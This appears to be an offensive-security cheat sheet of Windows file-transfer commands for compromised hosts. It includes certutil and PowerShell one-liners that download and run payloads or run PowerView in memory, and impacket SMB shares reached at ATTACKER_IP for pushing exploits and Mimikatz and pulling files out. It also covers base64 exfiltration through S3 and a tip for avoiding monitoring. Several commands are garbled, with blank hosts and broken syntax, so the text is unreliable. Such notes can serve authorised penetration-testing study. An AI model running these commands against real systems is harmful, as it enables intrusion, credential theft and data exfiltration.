certutil -urlcache -split -f C:\\users\\public\\shell.exe
certutil -urlcache -split -f C:\shell.exe & shell.exe

curl http://<URL/file.exe --output file.exe

upload /home/kali/Tools/Windows/nc.exe

#Powershell remoting
Copy-Item -ToSession $appsrv1 -Pathfile_to_copy.exe -Destination C:\Users\appadmin\Downloads


  • Attacker --> Victim

#Attacker's System
#Shares the current directory
sudo impacket-smbserver shared . 
sudo -smb2support Data $(pwd)

sudo python3 /opt/impacket/examples/ share . -smb2support -username user -password s3cureP@ssword
net use \\ATTACKER_IP\share /USER:user s3cureP@ssword 

net use \\ATTACKER_IP\share /del

#Victim's System
copy \\\shared\exploit.exe c:\users\public\file.exe

#Metasploit's smb_delivery

systemctl start smbd
    comment = hello
    path = /home/kali/shareddir
    guest ok = yes
    browsable = yes
    read only = no
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
  • Victim --> Attacker

impacket-smbserver pub `pwd`
sudo -smb2support Data $(pwd) -user kali -password mypass

#Victim: Powershell
net use z: \\\pub /user:kali mypass
net use z: \\\pub
cp "File name.txt" z:

net z: /delete

sudo impacket-smbserver shared $(pwd) -smb2support -username kali -password mypass

$pass= convertto-securestring 'mypass' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kali',$pass)
New-PSDrive -Name "shared" -PSProvider "Filesystem" -Root "\\\shared" -Credential $cred 
net use z: \\\shared

#List mounted shares
Powershell: Get-SMBShare
Without Powershell: net share

Via Web Server IEX(New-Object Net.WebClient).DownloadString(""); | powershell -noprofile -

powershell -c iex(new-object net.webclient).downloadstring(''); 
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<Source-IP/File>', '<Destination directory>')"

(new-object net.webclient).downloadfile('http://<Source-IP/File>', '<Destination directory>')

Invoke-WebRequest -Uri "http://<Source-IP/File>" -OutFile "PowerView.ps1"

#Execute in memory
IEX(iwr http://<IP>/PowerView.ps1 -UseBasicParsing) 

Exfil using Base64

Downloading Files Onto Compromised Host

S3 Bucket

  • Encode the file using certutil. certutil.exe -encode file.exe file.txt

  • Host the file on an S3 Bucket.

  • Access the file from the AWS S3 bucket and copy its content into a .txt file.

  • Decode the file. certutil.exe -decode file.txt file.exe

    • Use powershell as cmd may be monitored.


If we have access to a Windows machine with valid user credentials and that user is in the “Remote Desktop Users” group, we can share a local directory as a mounted volume through RDP itself when we connect to the machine:

rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries -u pelota -p /dynamic-resolution
xfreerdp /u:admin /p:password /cert:ignore /v: /workarea /drive:/localdir,share /dynamic-resolution +clipboard

